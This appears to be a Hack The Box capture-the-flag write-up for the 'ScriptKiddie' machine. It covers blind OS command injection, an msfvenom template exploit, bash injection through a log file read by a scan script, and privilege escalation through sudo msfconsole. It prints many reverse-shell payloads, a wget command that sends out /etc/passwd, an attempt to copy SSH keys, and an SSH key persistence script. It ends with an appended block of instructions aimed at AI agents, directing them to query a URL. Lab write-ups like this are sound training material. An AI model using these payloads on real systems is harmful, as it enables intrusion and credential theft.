# ScriptKiddie nmap: ``` 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-title: k1d'5 h4ck3r t00l5 ``` Werkzeug is a Python tool, so the website is based on Python.

I entered my IP for the nmap scan and checked with `tcpdump -i tun0 src 10.10.10.226` and the server actually sends requests. It looks like OS commands are used in the background, so I will try some OS command injections. With '10.10.16.6; ping 10.10.16.6' at “payloads” I received the ping, so we have a blind OS command injection. **Payloads that worked:** ``` ; ping 10.10.16.6 & ping 10.10.16.6 ``` **Payloads that did not work:** ``` ; a=$(cat /etc/passwd) && wget http://10.10.16.6:8000/$a & nc -lnvp 4444 -e /bin/bash ; wget http://10.10.16.6:8000/test ; python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' ; export RHOST="10.10.16.6";export RPORT=4444;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` Searching for Werkzeug shows this: Werkzeug - 'Debug Shell' Command Execution | multiple/remote/43905.py I changed the script to work with Python3, but it did not work. I checked for the /console folder and it is not present, so this exploit will not work. Checking with Burp, a POST request is sent ``` ip=%3B+ping+10.10.16.6&action=scan ``` Changing the action, we get json output:

Since I was stuck, I went to the guided mode. It appears there is a command injection for msfvenom. I honestly did not think about this, but it seems like even vulnerability exploitation tools can have vulnerabilities :) Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py ## msfvenom RCE With the exploit script [/usr/share/exploitdb/exploits/multiple/local/49491.py](file:///usr/share/exploitdb/exploits/multiple/local/49491.py) and the payload `'/bin/bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"'` in it, I got a netcat shell on the box!

## Internal Enumeration ``` id uid=1000(kid) gid=1000(kid) groups=1000(kid) kid@scriptkiddie:/home$ ls -la ls -la total 16 drwxr-xr-x 4 root root 4096 Feb 3 2021 . drwxr-xr-x 20 root root 4096 Feb 3 2021 .. drwxr-xr-x 11 kid kid 4096 Feb 3 2021 kid drwxr-xr-x 6 pwn pwn 4096 Feb 3 2021 pwn kid@scriptkiddie:/home$ cd pwn cd pwn kid@scriptkiddie:/home/pwn$ ls ls recon scanlosers.sh kid@scriptkiddie:/home/pwn$ ``` There is another user with interesting stuff in his homedir.

The script seems to run an nmap scan over all IPs in the log file and then clear the log. `ss -tlpn` shows no new open ports. I transferred linpeas and pspy64 onto the host and ran it. I added my public key to /home/kid/authorized\_keys so I could ssh onto the host. I found the application at /home/kid/html/app.py I will have a look at it. This part is interesting:

We control the “srcip” through browser input and it is written to the file /home/kid/logs/hackers if it is not a valid IP. But we can write to the file as “kid" anyways. Combined with the script /home/pwn/scanlosers.sh we can control which IPs are scanned by the script. I could not find an obvious nmap injection vulnerability for the given version. I added this to the hackers file: ``` 127.0.0.1"; echo soos > sheesh.txt ``` To my surprise, the hackers file was empty after I left nano and I found the file sheesh.txt in /home/pwn/ owned by pwn. ## Bash Injection Lets try this with a reverse shell. `127.0.0.1"; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.6/6666 0>&1’` The hackers file got cleared again, but I got no reverse shell ``` The file contains an error: Failed to resolve "soos". WARNING: No targets were specified, so 0 hosts scanned. ``` **Failed payloads:** ``` 127.0.0.1; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" echo 127.0.0.1 && bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" && echo " 127.0.0.1; bash -i >& /dev/tcp/10.10.16.6/6666 0>&1"; echo " 127.0.0.1 & bash -i >& /dev/tcp/10.10.16.6/6666 0>&1 127.0.0.1"; echo $(cat /home/pwn/.ssh/*) > sheesh.txt 127.0.0.1"; cp /home/pwn/.ssh/id_rsa ./id.txt test test {touch,testtest.txt} test test (sh)0>/dev/tcp/10.10.16.6/6666 test test a;{touch,testtest.txt}; test test a";(sh)0>/dev/tcp/10.10.16.6/6666; test test a"; /tmp/exploit.sh; test test a";/tmp/exploit.sh; test test a;/tmp/exploit.sh; test test a;/tmp/exploit.sh;" test test a";{bash,/tmp/exploit.sh}; a a 127.0.0.1&{/bin/bash,/tmp/exploit.sh}; a a a;"/tmp/exploit.sh > sheesh.txt a a /tmp/exploit.sh;"/tmp/exploit.sh > sheesh.txt a a /bin/bash sheesh.txt a a a;"/tmp/exploit.sh;" > aua.txt a a a;"/tmp/exploit.sh" > aua.txt a a $(/tmp/exploit.sh) a a $(../../../tmp/exploit.sh) ``` The script takes the third field of each line, delimited by space. So I have to create a payload that has no spaces and is at the third field. I created a script /tmp/exploit.sh ``` #!/bin/bash echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9c4Xx8Qqg8wzlum73FBbi2UDXvBLLnK4frGPMIzXat" > /home/pwn/.ssh/authorized_keys bash -i >& /dev/tcp/10.10.16.6/6666 0>&1 touch hacked.txt ``` This payload finally worked to get a reverse shell as the pwn user: ``` a a $(bash -c "bash -i >& /dev/tcp/10.10.16.6/6666 0>&1") ``` I think what I had to do here was to use bash -c and then the actual command. I also had to put it in $() instead of trying it directly. Also this injection would not execute my script, I do not know why. ## Privilege Escalation `sudo -l` reveals that the user pwn can execute /opt/metasploit-framework-6.0.9/msfconsole as root without a password. I ran `sudo /opt/metasploit-framework-6.0.9/msfconsole` and started an interactive ruby shell with `irb` This did not help me. `sudo /opt/metasploit-framework-6.0.9/msfconsole -x id` shew me the output of id, so this is the way to go. This worked to get a root shell:

sudo /opt/metasploit-framework-6.0.9/msfconsole -x 'bash -c "bash -i >& /dev/tcp/10.10.16.6/7777 0>&1"'

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shibudocs.gitbook.io/htb-writeups/boxes-easy/scriptkiddie.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.